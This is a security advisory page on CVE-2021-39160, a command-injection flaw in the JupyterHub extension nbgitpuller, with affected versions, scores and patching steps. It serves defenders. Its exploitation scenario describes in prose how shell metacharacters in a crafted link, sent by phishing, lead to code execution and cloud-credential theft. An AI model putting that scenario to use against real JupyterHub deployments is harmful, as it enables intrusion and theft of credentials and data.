AI Threat Alert
nbgitpuller, a JupyterHub extension widely deployed in AI/ML research and data science platforms, allows unauthenticated remote code execution when a user clicks a crafted link. Jupyter environments typically hold training data, model artifacts, API keys, and cloud credentials — making this a high-value pivot point. Upgrade to 0.10.2 immediately; there are no workarounds for versions 0.9.0–0.10.1 other than downgrade to 0.8.x.
Risk Assessment
High risk for organizations running JupyterHub-based ML platforms. CVSS 8.8 reflects network accessibility, no authentication required, and full confidentiality/integrity/availability impact. The low EPSS (0.83%) suggests limited active exploitation, but the attack is trivial to execute — a single link click by any data scientist or ML engineer is sufficient. Blast radius is amplified by the privileged access Jupyter servers typically have to model registries, cloud storage, and CI/CD pipelines.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nbgitpuller | pip | >= 0.9.0, <= 0.10.1 | 0.10.2 |
Do you use nbgitpuller? You're affected.
Severity & Risk
Attack Surface
Recommended Action
6 steps-
Patch: Upgrade nbgitpuller to 0.10.2 on all JupyterHub instances.
-
If upgrade is not immediately feasible, downgrade to 0.8.x as the only available workaround.
-
Disable or remove nbgitpuller if the feature is not actively used.
-
Audit JupyterHub access logs for unexpected git clone activity or unusual URL patterns in nbgitpuller requests.
-
Apply network egress controls on Jupyter servers to limit lateral movement.
-
Rotate any secrets or credentials accessible from affected Jupyter environments as a precaution.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2021-39160?
nbgitpuller, a JupyterHub extension widely deployed in AI/ML research and data science platforms, allows unauthenticated remote code execution when a user clicks a crafted link. Jupyter environments typically hold training data, model artifacts, API keys, and cloud credentials — making this a high-value pivot point. Upgrade to 0.10.2 immediately; there are no workarounds for versions 0.9.0–0.10.1 other than downgrade to 0.8.x.
Is CVE-2021-39160 actively exploited?
No confirmed active exploitation of CVE-2021-39160 has been reported, but organizations should still patch proactively.
How to fix CVE-2021-39160?
1. Patch: Upgrade nbgitpuller to 0.10.2 on all JupyterHub instances. 2. If upgrade is not immediately feasible, downgrade to 0.8.x as the only available workaround. 3. Disable or remove nbgitpuller if the feature is not actively used. 4. Audit JupyterHub access logs for unexpected git clone activity or unusual URL patterns in nbgitpuller requests. 5. Apply network egress controls on Jupyter servers to limit lateral movement. 6. Rotate any secrets or credentials accessible from affected Jupyter environments as a precaution.
What systems are affected by CVE-2021-39160?
This vulnerability affects the following AI/ML architecture patterns: Jupyter notebook environments, ML training platforms, Collaborative AI development platforms, JupyterHub multi-user deployments.
What is the CVSS score for CVE-2021-39160?
CVE-2021-39160 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.83%.
Technical Details
NVD Description
### Impact Due to an unsanitized input, visiting maliciously crafted links could result in arbitrary code execution in the user environment. ### Patches 0.10.2 ### Workarounds None, other than upgrade to 0.10.2 or downgrade to 0.8.x. ### For more information If you have any questions or comments about this advisory: * Open an issue in [nbgitpuller](https://github.com/jupyterhub/nbgitpuller/issues) * Email our security team at [security@ipython.org](mailto:security@ipython.org)
Exploitation Scenario
An attacker targets a data science team using JupyterHub with nbgitpuller enabled. They craft a malicious nbgitpuller URL embedding OS commands in an unsanitized parameter (e.g., a repository URL or branch name containing shell metacharacters). The URL is delivered via a phishing email disguised as a shared notebook or dataset link — a common workflow in ML teams. When the victim clicks the link while authenticated to JupyterHub, nbgitpuller processes the unsanitized input and executes the injected commands in the notebook server's OS context. The attacker gains RCE, exfiltrates cloud credentials from environment variables, and pivots to the organization's model registry or S3 training data buckets.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H References
- github.com/advisories/GHSA-mq5p-2mcr-m52j
- github.com/jupyterhub/nbgitpuller/blob/main/CHANGELOG.md
- github.com/jupyterhub/nbgitpuller/commit/07690644f29a566011dd0d7ba14cae3eb0490481
- github.com/jupyterhub/nbgitpuller/security/advisories/GHSA-mq5p-2mcr-m52j
- github.com/pypa/advisory-database/tree/main/vulns/nbgitpuller/PYSEC-2021-315.yaml
- nvd.nist.gov/vuln/detail/CVE-2021-39160
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution